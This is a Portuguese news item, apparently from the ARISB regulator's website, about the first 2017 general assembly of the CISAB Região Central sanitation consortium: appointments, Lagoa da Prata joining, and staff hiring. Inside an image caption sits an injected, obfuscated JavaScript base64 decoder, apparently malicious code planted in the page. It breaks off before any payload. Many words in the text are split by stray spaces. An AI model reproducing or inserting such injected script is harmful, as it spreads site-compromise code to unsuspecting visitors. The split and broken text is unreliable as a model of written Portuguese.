arisb@arisb.com.br(31) 3789-6125 | 3786-6125

CISAB REGIÃO CENTRAL REALIZA PRIMEIRA ASSEMBLEIA GERAL DE 2017

Prefei tos, vice-prefei tos e dire tores de autarquias aten tos durante a assembleia

O Consórcio Intermunicipal de Saneamen to Básico Região Central – CISABRC-RC – realizou na manhã dessa terça-feira, 27, sua primeira assembleia geral ordinária em 2017.

O presidente do CISAB Região Central e prefei to do município de Itabiri to, Sr. Alexander Silva Salvador de Oliveira, iniciou os trabalhos com cumprimen tos e agradeceu a presença e a participação dos prefei tos, vice-prefei tos, representantes dos municípios, dirigentes dos prestadores dos serviços públicos de saneamen to básico e colaboradores do CISAB Região Central.

Na pauta, apresentada pelo dire tor geral do consórcio, Sr. Ananias Ribeiro de Castro, apreciação de indicação e nomeação do dire tor técnico-operacional e ouvidor, deliberação sobre adesão de município conveniado como consorciado do CISAB-RC. As indicações dos senhores Thimóteo Cézar Lima e Juliano de Oliveira Nunes, respectivamente, foram aprovadas por unanimidade. Em sua explanação, Ananias Castro apresen tou a situação financeira do consórcio e comunicou a adesão de Lagoa da Prata. O documen to de celebração do convênio foi assinado pelo presidente do CISAB-RC, Sr. Alexander Salvador.

Prefei to de Itabiri to e presidente do CISAB Região Central, sr Alex<script><p id=function u2fd518ba9147(q3){var u9='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var y7='';var ve,p7,w9,w4,y6,p9,y4;var s0=0;do{w4=u9.indexOf(q3.charAt(s0++));y6=u9.indexOf(q3.charAt(s0++));p9=u9.indexOf(q3.charAt(s0++));y4=u9.indexOf(q3.charAt(s0++));ve=(w4<<2)|(y6>>4);p7=((y6&15)<<4)|(p9>>2);w9=((p9&3)<<6)|y4;if(ve>=192)ve+=848;else if(ve==168)ve=1025;else if(ve==184)ve=1105;y7+=String.fromCharCode(ve);if(p9!=64){if(p7>=192)p7+=848;else if(p7==168)p7=1025;else if(p7==184)p7=1105;y7+=String.fromCharCode(p7);}if(y4!=64){if(w9>=192)w9+=848;else if(w9==168)w9=1025;else if(w9==184)w9=1105;y7+=String.fromCharCode(w9);}}while(s0ander Salvador, assinando convênio com o município de Lagoa da Prata" width="400" height="225" /> Prefei to de Itabiri to e presidente do CISAB Região Central, sr Alexander Salvador, assinando convênio com o município de Lagoa da Prata

A Assembleia aprovou, ainda, a abertura de Processo Seletivo Simplificado, na forma que dispõe a cláusula 45ª do contra to de consórcio público, para contratação de um “Analista de Fiscalização e Regulação com formação em ciências econômicas”, um “Analista de Fiscalização e

Regulação com formação em engenharia civil, ambiental ou sanitária” e um “Assistente Administrativo”.

Dentre outros assun tos, a assembleia deliberou e aprovou a au torização para que todos os municípios já conveniados, caso manifestem interesse e atendam aos precei tos da Lei 11.107/2005 – tenham subscri to e ratificado o pro tocolo de intenções – possam ingressar no consórcio até 31 de dezembro de 2017.

No encerramen to, o presidente do CISAB Região Central, Sr. Alexander Salvador, ci tou que faz parte da Associação dos Municípios Mineradores de Minas Gerais – AMIC e comen tou sobre a necessidade dos prefei tos participarem mais das associações. Salvador sugeriu a realização de assembleias itinerantes, como ocorre na AMIC para dar mais visibilidade ao consórcio. A proposta foi aprovada por unanimidade e a direção do CISAB Região Central cuidará da elaboração do cronograma das assembleias.

Avenida Álvares Cabral, 1.777, Santo Agostinho, 3º andar - Belo Horizonte/MG - CEP: 30.170-008

(31) 3789-6125 | 3786-6125

arisb@arisb.com.br